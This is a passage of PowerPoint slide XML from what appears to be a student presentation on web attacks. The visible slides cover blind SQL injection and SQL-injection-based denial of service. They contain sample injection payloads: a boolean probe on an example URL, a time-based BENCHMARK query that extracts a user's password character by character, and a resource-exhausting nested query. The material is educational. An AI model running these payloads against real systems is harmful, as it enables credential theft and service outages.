              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This Example can allows the attacker to get info from the DB and change accounts info and privilege. It works to find the username and password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276672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2DA4-B152-4ADC-B13F-885E2A391E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind SQL INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE79649-7FA4-4245-A8C7-F118392F51F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two Main Forms Content Based and Time Based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC53BA3-26F4-423B-85EC-9EBBEDA77134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack that will ask the database true or false questions. It will determine this using queries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is used when app shows generic error messages but not mitigated the code vulnerable to SQLI.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83138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3E2C-24FD-4DDF-B644-5CCBBB15C540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content Based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D35E47-051E-4B81-BE74-1630B43C281E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID in URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C685DB-A677-45B6-A582-5902CEA60EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Means attacker can probe if content based SQLI is workable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346CDDE0-D789-401F-AC99-B19E685F404A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example of ID IN URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B88AC1B-9D42-4907-AD8C-AA679565D392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://newspaper.com/items.php?id=2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send query, select title desc body from items where id = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject with url: .com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>items.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=2 and 1=2 if it returns nothing the page is vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B103B9E-53FA-440D-BB38-FF4303B99C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153868" y="1907823"/>
            <a:ext cx="4185691" cy="4026236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369406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155D-9831-44CD-B340-76A1258EDE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time based</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D8F83D-F3F6-4F74-89ED-55887280B965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relying on time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBDF421-C080-4338-B3C7-6E40E47D080B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Database must pause for a specified amount of time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5184C4F4-E17D-423A-8A16-05B8F1EFDB7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3109F8AC-99D5-4C13-BCCD-B5A477B89560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benchmark(500000,Encode(‘msg’, by 5 seconds))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This should just take a moment to finish but its important to run a high amount to affect the DB response time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C611E751-3E56-483B-86CE-F8580B121041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to use to attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23EEDA2-6A17-4620-9F97-8A9D5D4AC38C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Unionselect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if(substring(user_password,1,1) = CHAR(50), Benchmark(5000000,Encode(‘msg’ by 5 seconds)), null() FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If there is a delay we my expect first user password char to be 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289994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ED60-D36A-4A4C-B5BF-8089586890D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> injection + insufficient authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E12C88CE-2889-4475-A2C2-9426EDCB0B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rudimentary mistakes allows for this attack. Occurs when security parameters have not been initialized and the attacker can access secure content without verifying the user credentials. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190532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F2E7-B6B9-4032-92FA-4C5FFC1B22B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> injection + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F993F6E4-2A08-470F-92C3-3FF767AE38ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DDos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015D1254-846B-43CD-9AFD-96482D0F3F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> injection to hang a server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F4DAB0-B744-4219-9108-815B22DD2DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C220351-0FD7-41B1-B795-D49B04704471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select tab1 from (select decode(encode(convert(compress(post)using latin2), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>post,post,post,post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)), sha1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>post,post,post,post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)))as tab1 from table 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836BEC00-BD35-4FB5-BEFA-48D58996861D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What it does</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EE09C95-8D5A-461D-9488-F24194AD449B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates a table of 500 rows with text having 500 bytes of data per column. This attack is useful for DDOS because it does not require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>many bots.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3595152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824</TotalTime>
  <Words>1110</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vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>Basic Refresher</vt:lpstr>
      <vt:lpstr>Sub-Classes</vt:lpstr>
      <vt:lpstr>Filtering Escape Characters</vt:lpstr>
      <vt:lpstr>Blind SQL INJECTION</vt:lpstr>
      <vt:lpstr>Content Based</vt:lpstr>
      <vt:lpstr>Time based</vt:lpstr>
      <vt:lpstr>Sql injection + insufficient authorization</vt:lpstr>
      <vt:lpstr>Sql injection + DDos</vt:lpstr>
      <vt:lpstr>CROSS SITE SCRIPTING</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Consequences</vt:lpstr>
      <vt:lpstr>Reflected xss</vt:lpstr>
      <vt:lpstr>Persisted</vt:lpstr>
      <vt:lpstr>Dom based xss</vt:lpstr>
      <vt:lpstr>Defense</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>What is CSRF?</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting’s “Little Brother”</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting’s “Little Brother”</vt:lpstr>
      <vt:lpstr>Successful CSRF Requirements</vt:lpstr>
      <vt:lpstr>Referer Header</vt:lpstr>
      <vt:lpstr>Server Requests</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Mitigation Techniques</vt:lpstr>
      <vt:lpstr>Notable CSRF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dc:title>
  <dc:creator>Hopkins, Matthew</dc:creator>
  <cp:lastModifiedBy>Nathan</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-26T09:34:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-27T05:55:24Z</dcterms:modified>
</cp:coreProperties>
</file>